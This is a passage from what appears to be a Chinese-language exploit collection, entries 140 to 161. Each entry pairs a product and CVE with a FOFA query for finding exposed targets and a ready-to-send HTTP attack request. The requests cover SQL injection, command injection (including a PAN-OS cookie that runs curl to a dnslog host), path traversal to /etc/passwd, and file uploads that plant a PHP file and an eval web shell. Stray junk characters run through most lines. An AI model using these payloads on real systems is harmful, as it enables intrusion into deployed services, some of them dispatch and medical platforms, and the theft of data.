3 d' [; Q; L; v; G# h4 z: ^GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1: o2 H- r" U1 r5 h( K
Host: x.x.x.x
2 L0 b! B% n$ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0- a% T: Y5 s" I. g1 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! u# c% G' N, Q1 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; }. M* _2 }4 n K* p- q) ]# |7 yAccept-Encoding: gzip, deflate, br
' e, ~- n$ \: X% ]8 u% Z: GConnection: close" k( i0 s, P) s& w) d B/ U6 N
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk. `& A% j7 c9 h8 P! j
Upgrade-Insecure-Requests: 1# y& y0 }- q! `* n
- m/ J# R$ `0 [ g
; e c/ V2 ]) d e K140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
8 Z& p) I9 R3 G* l0 T% k/ M& O7 c! pCVE-2024-2566/ ~& _$ ?( N% D( R2 Z7 ?2 z1 z
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 K; r1 V, T' x0 PGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
$ h' E1 k! c0 z- c. f( hHost: x.x.x.x/ Z) B! c, m' B# c# `9 `9 Z l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: k/ E6 o* G _7 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ j0 O+ ^5 G- }; J# T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ~' n5 ?3 ~& r( s+ J6 J+ e
Accept-Encoding: gzip, deflate, br, Q, E2 U& E! D) O) V+ G$ w; F
Connection: close$ z* g5 { U, T: b& j2 H7 ~+ t
Cookie: authcode=h8g9
( _! j+ I" i7 EUpgrade-Insecure-Requests: 1
8 y4 L" c( b6 w5 C: o( E0 X2 U0 E! e
/ b- D( X; G T9 u1 h4 p141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 q+ O+ L" A* L
FOFA:body="指挥调度管理平台"$ W, f& F5 u2 L
POST /app/ext/ajax_users.php HTTP/1.1
. c% L/ o3 n; I8 dHost: your-ip4 M4 R% x! l+ j0 g( E
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info5 N+ Q3 l( C+ F+ |6 U
Content-Type: application/x-www-form-urlencoded8 D- K9 q; [" p
" N# @7 f. L/ g/ {
$ ? q0 I# Y5 u* ~- J7 k6 a
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -! v: [- Q0 e/ p% Y( M: y
- f& O( J+ w$ J) o$ m% A
3 u' K' f3 `0 l1 {' B' }9 K142. CMSV6车辆监控平台系统中存在弱密码
; n+ v8 ], u3 [8 k" sCVE-2024-29666
. Z9 X* i' K5 T' o7 x7 DFOFA:body="/808gps/"
: ?7 U/ p S: n9 N8 Iadmin/admin
3 i, J9 E9 q' ]143. Netis WF2780 v2.1.40144 远程命令执行
1 q- |- y! Y. sCVE-2024-258501 M" H! M* A* Z F; ]; K6 d
FOFA:title='AP setup' && header='netis'5 Y& n% j+ p2 Y; s7 H
PAYLOAD
7 E- F3 ?: i1 L/ V% r$ E% e
* G5 ^# O, q6 L144. D-Link nas_sharing.cgi 命令注入
7 W+ j, h" K4 _/ Q+ f& ^FOFA:app="D_Link-DNS-ShareCenter"% r8 Y# ?% l4 ]4 a( u1 d2 z
system参数用于传要执行的命令/ x; U+ `9 e8 p
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1* o' f& B* _/ W( [1 Z
Host: x.x.x.x
B6 j; Z/ S) Y' V6 UUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0' Q' h: s; f8 q8 j9 {) ~
Connection: close
; H2 @3 r) C1 V1 y0 xAccept: */*
) T+ ^9 d. Y7 V5 |Accept-Language: en
4 J) T, k/ {) Z! t% P/ dAccept-Encoding: gzip @' L6 y, ^( q/ N$ c2 _3 H1 Q
& _) B: J5 e7 ]* u2 O* H
& V3 c2 V' S; I! N145. Palo Alto Networks PAN-OS GlobalProtect 命令注入0 k. Z! u; _5 S" u: e. r: |
CVE-2024-3400$ `: ?7 x! i x5 q2 u
FOFA:icon_hash="-631559155"
0 B; j: {) N: k3 V# cGET /global-protect/login.esp HTTP/1.1
' ~) j! O( i n$ EHost: 192.168.30.112:1005
+ P: g5 l7 p2 M: RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84* j1 k S6 A% ?# `( l9 v8 H, m
Connection: close
9 T- w/ Y7 k( j# [Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;$ N" o9 P2 ^; y. I7 L
Accept-Encoding: gzip5 E9 I3 `& J7 Y+ c
7 i7 m1 l3 v# d- a6 k) x: Z
* E1 D3 w9 B. \5 v0 t146. MajorDoMo thumb.php 未授权远程代码执行3 D1 T/ _& A. \, m; m
CNVD-2024-02175
; e' x! d$ M% z" Z5 Y4 EFOFA:app="MajordomoSL"
@! J" \$ ~6 v& m- Y: q) oGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
) ^( X( T: c9 r( q* S2 J& zHost: x.x.x.x i5 y' ^) ]; v. D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
5 j) u+ e3 |& z0 t4 h: _Accept-Charset: utf-8( ]6 I% ?; h4 p O2 |3 o
Accept-Encoding: gzip, deflate
' \* Z* S9 y, x/ X9 x LConnection: close
4 h- k7 y* ~$ ?$ ~" {7 H- X5 h' @1 ] I& V4 Y* j; G: Y+ O
8 Q, V( e4 n( Q( L. A6 V2 Z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ {* D# x$ S5 Q5 j+ x; w5 f, aCVE-2024-32399; ]( w Y5 w, W
FOFA:body="RaidenMAILD"4 S% n. f& y4 H( N" n
GET /webeditor/../../../windows/win.ini HTTP/1.1+ [, d* W5 p( @1 d, i! t
Host: 127.0.0.1:817 [4 W x& I7 Y; K% n
Cache-Control: max-age=0. d9 ` _# Y4 r" J* n$ w0 H
Connection: close
" z9 m4 V# o5 x
2 w) @" ]8 A% Q$ w/ c/ x& ^% A# Z, D
! `, f* s1 q/ E. S$ f. O' K148. CrushFTP 认证绕过模板注入
6 a& @. P7 [% w6 i. D6 CCVE-2024-4040
8 n4 E4 t, K s2 N/ kFOFA:body="CrushFTP", f a. q: M1 X# V
PAYLOAD
3 e# T% E6 B" [7 t: k$ N j
% G4 L5 d1 I$ d7 _; \149. AJ-Report开源数据大屏存在远程命令执行! X9 Y5 K5 k6 O- i
FOFA:title="AJ-Report"
3 _ C" T0 ~5 L. M! W9 v, H$ _, a1 P* Y% h. p2 X/ ?
POST /dataSetParam/verification;swagger-ui/ HTTP/1.12 A) T: p" j/ }5 r1 ^* C; ?: q
Host: x.x.x.x* l& e3 q: R) W+ O# O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
s# o# u7 ]) }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 k3 D# I3 J' w8 t8 v! @6 o2 kAccept-Encoding: gzip, deflate, br
+ h% b, w: F5 q) S# RAccept-Language: zh-CN,zh;q=0.90 ^7 F: F. [2 C5 C$ Y2 N
Content-Type: application/json;charset=UTF-8
- r6 J, ]* `, K! {9 QConnection: close
! `) K+ V( ?7 ^9 `. Y# ~3 ]2 Q9 ]* y# T) e. a0 y( u. e% g0 t
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
' \/ j' G& S' k
2 E# z2 w1 K% t E% e2 t `( X150. AJ-Report 1.4.0 认证绕过与远程代码执行5 a. w8 l; |( [3 o: t/ X) w
FOFA:title="AJ-Report"
W) f: @& ]( n" c. {7 W- X* WPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1, L9 i. K1 j8 T/ W9 F5 V9 b3 q
Host: x.x.x.x
`$ O2 w# C8 B f2 V$ D$ k" u* RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" O2 H6 [3 N/ C7 ~* l U% ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 T( m8 F- A6 e$ V2 D# q2 s* J$ DAccept-Encoding: gzip, deflate, br! ~4 v+ g+ a! p( @; b3 g W( k
Accept-Language: zh-CN,zh;q=0.9
' |* t- ]9 D, L0 w- V& g9 LContent-Type: application/json;charset=UTF-8' w6 r* q2 l% \% p+ J
Connection: close7 q+ Z; _% S) N6 ^4 U8 K$ U; A
Content-Length: 339* K) F( L8 A7 G
4 G9 Q; _7 T( Q: Z% q8 @: s. F; O{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}1 e) [2 E, _) W/ Y2 O2 G
4 v0 [ `7 L3 a- V2 G0 F& x6 E
3 u( S+ k B7 Q- F151. AJ-Report 1.4.1 pageList sql注入
7 J( @5 A* I: r6 DFOFA:title="AJ-Report"
0 i6 C: Y3 Z% [ T+ zGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
' N5 R$ @0 M" MHost: x.x.x.x9 C, k/ W/ T- J0 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. C; c& Q* a' a- t" R4 D
Connection: close. T7 x9 y1 e. F
Accept-Encoding: gzip
" F9 `4 `( R A4 |
/ V% B0 N ?3 [6 D% q- L+ I
# ]1 h9 X6 U# W- V. u152. Progress Kemp LoadMaster 远程命令执行
, b2 `6 F4 ~9 b4 vCVE-2024-1212
3 c( m9 D$ Q2 X, v* w/ ZLoadMaster <= 7.2.59.2 (GA)
& V/ `5 _* }, \: w- |* aLoadMaster<=7.2.54.8 (LTSF)% l0 C5 A& j, X0 [/ X8 s9 }
LoadMaster <= 7.2.48.10 (LTS)4 B; w+ n) Q0 s5 \9 a! e% R) }
FOFA:body="LoadMaster"
$ p0 a C8 f$ wJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码+ _# F' { f8 G/ e: i: F
GET /access/set?param=enableapi&value=1 HTTP/1.19 d5 w7 O& Y1 F+ }9 }- K
Host: x.x.x.x
7 @7 Q! z, V3 _- M8 `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
2 }1 d4 O6 h0 U; SConnection: close
1 t3 T3 h3 d2 |, h+ IAccept: */*( I2 t \4 c p2 \
Accept-Language: en5 R L- M+ A; w8 W* y) [4 p7 z+ j6 b
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
# H8 v- f* \. p& gAccept-Encoding: gzip
4 X6 Q# h) i& ]% y4 l" M" n2 H
; z8 X x9 I, @* y0 q. v- r8 y. _0 H _
153. gradio任意文件读取
* O h9 }8 I& k5 _ O, F7 jCVE-2024-1561FOFA:body="__gradio_mode__"
8 S6 S) T& }! w. x第一步,请求/config文件获取componets的id- t& a: q' p2 E% s. U
http://x.x.x.x/config
* R0 P/ a- p5 r- V6 _( [3 _7 m" s+ E4 {' f/ u5 L; X9 ^! G" R
8 U6 Q$ x' m$ z; r9 f; }+ Y第二步,将/etc/passwd的内容写入到一个临时文件
: t5 e$ X7 b) PPOST /component_server HTTP/1.1
/ f: {7 m4 {, @% H* ?- m- FHost: x.x.x.x
6 n9 L6 i6 ^0 o, wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
- n) f7 }6 w0 k- e) W2 H2 QConnection: close
Z5 n+ T! P" j8 |: ~Content-Length: 115
! i. A9 v; z! p) Q0 j. SContent-Type: application/json5 {; y2 c6 `2 K
Accept-Encoding: gzip; B( p1 c+ O4 X
8 G' ^. u& I1 p{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
. G$ |! J# z7 {5 k
5 T4 J9 T6 S& \! }5 l( K% x2 t2 T! U) Y7 `+ m! Z9 k- h' n# L
第三步访问6 x0 K4 R2 P4 R/ @
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd( o+ [& G8 U! C# I* C
% R1 e4 T1 ^; ~
- ?, {! z& _4 _5 c154. 天维尔消防救援作战调度平台 SQL注入
- a' T: W8 {9 G8 F- C0 \- B" aCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"$ R8 F, M0 ~/ z: j" O+ D
POST /twms-service-mfs/mfsNotice/page HTTP/1.15 `. Q; x, \8 C8 U! x
Host: x.x.x.x
( M# @- Q3 b1 V7 E4 H: fContent-Length: 106$ l- Q$ n+ [, q U
Cache-Control: max-age=0, t6 q+ [2 h. J
Upgrade-Insecure-Requests: 1
1 W/ k E1 {; QOrigin: http://x.x.x.x! R! M5 m p; t$ C
Content-Type: application/json
* M7 |4 m! x. O8 O$ s2 N6 k8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: U2 V# A# H8 ~0 r" h; gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! k' L$ Q6 F5 m: ^; t* |) oReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page6 V4 r- L) h# s! v* X' v7 }$ n
Accept-Encoding: gzip, deflate# a, Q6 {& T/ D% ^! H' ]
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.74 p2 a" T9 y" V# Q7 [# ]
Connection: close
1 A6 Y# } s3 |: n2 [
- p+ I! h8 ~$ u{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}) {9 C+ B& Q, S0 ~1 b7 ~
8 Q9 o+ h: C4 \' G! C, d) Q) N, G0 N
155. 六零导航页 file.php 任意文件上传
. P- ]" [) T# k2 E$ S' Y tCVE-2024-34982
% ?" @9 {+ q' H! d) K1 o, O4 XFOFA:title=="上网导航 - LyLme Spage" q; ]8 L5 x6 G0 {6 B. C0 C
POST /include/file.php HTTP/1.1
5 M# N6 c" s: S- y3 D0 t& X7 QHost: x.x.x.x# j8 ^! I* ^, s# v8 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.09 H2 }( _3 k% Z2 y7 g2 i) g# W6 H
Connection: close
3 G. B1 d x4 F3 S3 _( S) y/ S2 DContent-Length: 232% _5 q4 b- w: T
Accept: application/json, text/javascript, */*; q=0.01. ?, i1 D* E/ o) V6 w l
Accept-Encoding: gzip, deflate, br
) z: r, ?5 v. L8 l% w0 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 C; R w0 o) n7 M4 H, m5 t) {8 }/ t
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
0 i3 Z/ c+ g, ^8 R" ^8 Y {$ wX-Requested-With: XMLHttpRequest- W. \0 T! Y0 p' x! s( Y
2 l5 ~% ^/ ? l3 U# n" D
-----------------------------qttl7vemrsold314zg0f
. d( ~1 F$ Q$ G: ?% S1 F/ T. fContent-Disposition: form-data; name="file"; filename="test.php"
4 y6 O7 ?! R* M' x) ]$ SContent-Type: image/png" R1 I, E% I- F( F
! @( i! ~# p |( Y7 Y$ T
<?php phpinfo();unlink(__FILE__);?>
! P) }# Q5 R2 X H' @7 D/ _$ J6 Q-----------------------------qttl7vemrsold314zg0f--* u l# {: q$ a6 U4 b' T1 R. W! w
( A- z/ U, `" ~/ B
5 w: L; q% i* }3 G* V: c, M访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
! j. q% i/ P# L* `9 c1 d5 H" `
% s) u1 O' r" r9 j156. TBK DVR-4104/DVR-4216 操作系统命令注入. z: |2 z! i9 T$ D0 `8 [
CVE-2024-3721
; y Q. N3 b3 j+ U, C: l( NFOFA:"Location: /login.rsp"4 }- p- M7 a5 _8 `& u, ^
·TBK DVR-4104
G7 y. e7 Q2 M& V& e·TBK DVR-4216
2 d6 k) U# @& ecurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
! i) p3 e9 @. J: H0 J( d; j% h
2 Y+ G& f7 d/ d( W# V3 E1 Q: F5 o
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1# A% }9 d2 j% t" D5 o: U
Host: x.x.x.x" q4 x1 o$ M# t4 {! L& t7 R* l0 }; P9 u
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# ^8 K' q* z" i$ A; b, t7 \* kConnection: close0 } c7 R7 R- c% ]/ b2 Y) W6 \/ ~
Content-Length: 0/ V9 b- l7 K' E8 N$ V2 J* I
Cookie: uid=1# C2 _) j8 P+ ^0 i/ U7 v( ^
Accept-Encoding: gzip
5 k7 v% ^, b2 d7 R `7 C" \# J: a) E1 }
1 P+ i$ P# R! L! N% [) [+ p
157. 美特CRM upload.jsp 任意文件上传
: \/ Y3 _1 G; W" @CNVD-2023-06971
8 Y5 r- `3 [' S5 Q' T! O7 d* I- RFOFA:body="/common/scripts/basic.js"
|2 u$ C7 z- c# h3 I* O6 v- vPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1$ _: i9 k0 [& S: @: ~) `# |
Host: x.x.x.x8 l* M( q5 u$ F; c( `2 h! N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
. e6 t3 }' l( o5 x# vContent-Length: 7097 |- I6 X9 N- B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 L) h* b% \7 c3 T& eAccept-Encoding: gzip, deflate
: e8 l! o* w$ s2 a; ?4 LAccept-Language: zh-CN,zh;q=0.9
a t5 L: ~$ G9 \Cache-Control: max-age=0( a% f6 n1 _) |* k& f$ Q& N! R
Connection: close X a/ Y- t7 D t+ x; `( H) `) Z' B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN7 L7 [3 H9 G/ D+ j
Upgrade-Insecure-Requests: 1, S, s9 L7 `, y
& X' e8 ^% i* N- v F' z
------WebKitFormBoundary1imovELzPsfzp5dN
5 t8 Z9 x/ Q& d8 F; M4 UContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
& K) h4 O+ a( k0 C: m+ l" {Content-Type: application/octet-stream& d% d9 U, _0 l' j' E2 _
5 p( @: T/ J) I6 w+ F6 {+ O5 n
nyhelxrutzwhrsvsrafb8 w, d& H N; }
------WebKitFormBoundary1imovELzPsfzp5dN6 q8 Q; o6 F; T! h
Content-Disposition: form-data; name="key"
( ~0 O' x, B! ^* v4 C. j
2 V. f) ]! }/ l* D" ynull+ h" U% K. F' m5 t; n0 G/ ]
------WebKitFormBoundary1imovELzPsfzp5dN& l# \4 F: U6 B" T! I
Content-Disposition: form-data; name="form"
; w% ~4 |& D, c T8 L4 ?$ F. ]; y0 G; g4 j
null O( W& U) D9 S' h0 c
------WebKitFormBoundary1imovELzPsfzp5dN! F6 i! f" N6 |3 J' {8 A# r
Content-Disposition: form-data; name="field"+ H* E8 N t/ P
8 C2 }1 J/ e7 Z/ I9 m" Jnull' T7 c5 x, J* Y( D+ i
------WebKitFormBoundary1imovELzPsfzp5dN: w' u5 F j) [4 `; R, r' B4 R
Content-Disposition: form-data; name="filetitile"
6 }8 {3 m! {% N/ v% s$ Z7 E: _8 D$ z' {; Q
null
+ {/ q" ]- E; K# B------WebKitFormBoundary1imovELzPsfzp5dN' f( @6 m* [9 M1 }8 e
Content-Disposition: form-data; name="filefolder"4 ^8 F+ ]$ }" s! Q/ k$ {* U4 s3 N( E
- o+ F. j' {+ \null
0 q) ]6 x# ]4 E7 V------WebKitFormBoundary1imovELzPsfzp5dN--
- A" T4 l! M% B8 B0 Y
! V; W, C" D |; ^% W L
: D4 n4 J) Q+ s' D/ L ?http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
# w: H# t$ ]! S; a4 Z! _, }$ f# t
# I; P$ G" w: y& h3 v( a158. Mura-CMS-processAsyncObject存在SQL注入
p8 | g# ]8 J' T: X. X3 \CVE-2024-32640
7 L7 N2 ] v! I# cFOFA:"Generator: Masa CMS"
- o. a- Q: A+ \( FPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
4 D2 i8 ?# {$ T9 T( ?" ? KHost: {{Hostname}}
3 w1 ~. U4 }+ y7 aContent-Type: application/x-www-form-urlencoded; ]; l9 Q% @6 C2 `8 b
: o8 X) b+ B7 a) k% Z# _9 a
object=displayregion&contenthistid=x\'&previewid=1
) H3 c; l! i2 b
X% }$ j2 E4 J: F, x- x9 }& m9 E1 X1 y, a# P
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
% B. l9 g9 v7 UFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")% ^1 ^6 X# s/ J/ K+ V1 `& N$ M8 n
POST /webservices/WebJobUpload.asmx HTTP/1.1
' F: N4 S4 m7 t( H' V7 b6 GHost: x.x.x.x+ B9 B0 l+ r( E- v, x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36$ N; ?2 i4 D/ m( {2 O
Content-Length: 10803 g( ^, @+ u0 m3 H! @4 A1 j
Accept-Encoding: gzip, deflate
& ]3 u; Z, ^6 e/ r5 [. I/ cConnection: close; q$ @. n y- k' N% a7 F. C
Content-Type: text/xml; charset=utf-8- l5 u/ e: N& O
Soapaction: "http://rainier/jobUpload"
0 o% U1 t. p5 E) P4 R- Y
+ y% ^, V+ y* m5 L<?xml version="1.0" encoding="utf-8"?>9 [0 f! S- |$ h8 {1 J
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 _+ r. Y1 z$ O* o% G* b7 w# a
<soap:Body>6 \" ~3 c: [; ? u% N
<jobUpload xmlns="http://rainier">
% Q5 p- U( J1 d<vcode>1</vcode>
: Q9 i4 a7 P) z3 L$ U<subFolder></subFolder>8 g3 ?: B4 n/ G u; {
<fileName>abcrce.asmx</fileName>
/ Q: N. U4 T. I1 P7 [6 N1 Y; l6 @<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>& P( B# r& q$ E
</jobUpload>
8 P2 V; b6 X5 i" h: Y</soap:Body>
6 _) H) z0 z/ u% @1 @</soap:Envelope>
8 Z5 d/ }/ g. [. u. ~
6 P/ p0 S" j! ]5 {/ T# D# o" E; M2 ~+ m- h6 z- @9 i
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")& @- x0 ^3 `9 B
$ t6 z( V3 `6 U3 Y, Z/ H6 T
8 N8 x* x% i- |6 \/ U160. Sonatype Nexus Repository 3目录遍历与文件读取5 |/ p! Z' w& Z& b# K, ?2 h
CVE-2024-4956; f+ Z! r! Z; F- }% a
FOFA:title="Nexus Repository Manager"
8 @ I% O$ \$ w+ wGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 e+ J! j0 N# K8 t+ h* U( W) W% `
Host: x.x.x.x
6 X, X" O0 g0 x& `! [2 uUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
/ G/ ]) ^4 v, }+ s- X+ c8 m' K/ Y8 @Connection: close
5 [7 l, E8 J! W! {; S1 WAccept: */*
) [1 i0 h6 a+ `Accept-Language: en+ b8 b' f- O, d# k- h
Accept-Encoding: gzip' y/ ~3 x! E7 X" [( d
/ b$ B( g$ h( b, S! i) W p
* G# b, G8 E% ]/ C* v# v8 J161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
# F* e2 S' k# }! q9 n/ b8 R. u+ C. l3 KFOFA:body="/KT_Css/qd_defaul.css"
; q, u& o2 ~* ~/ D: l! L8 o% S- X第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密$ c: x) T; B' X8 U0 z* {& u. Q
POST /Webservice.asmx HTTP/1.1
: J! _# r5 h3 x) D6 AHost: x.x.x.x. j2 O0 ~3 v1 D8 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.369 Y$ ?. z( ]2 A
Connection: close
1 Q+ B, o2 ~" z- V. bContent-Length: 445$ T: b6 v4 o/ G0 L; s" ^+ Y% N D2 T
Content-Type: text/xml' v! M2 a% h [1 S! Z. A
Accept-Encoding: gzip" P4 c5 M7 Y. H k3 e5 A
/ X9 R. q9 `5 K" B6 ?. n<?xml version="1.0" encoding="utf-8"?>+ {' |' _9 _( `3 y/ ], O" K+ V
<soap:Envelope xmlns:xsi="
3 i/ g) J( w. }9 }& ^http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
: k2 ^) P6 ~( `2 Exmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
5 o) Z7 m8 o+ ]2 @! q" e D% E<soap:Body>0 Z. Q: f6 h3 A1 Y* E) o9 C+ B
<UploadResume xmlns="http://tempuri.org/">
4 K, \& x0 p4 M$ A6 x<ip>1</ip>
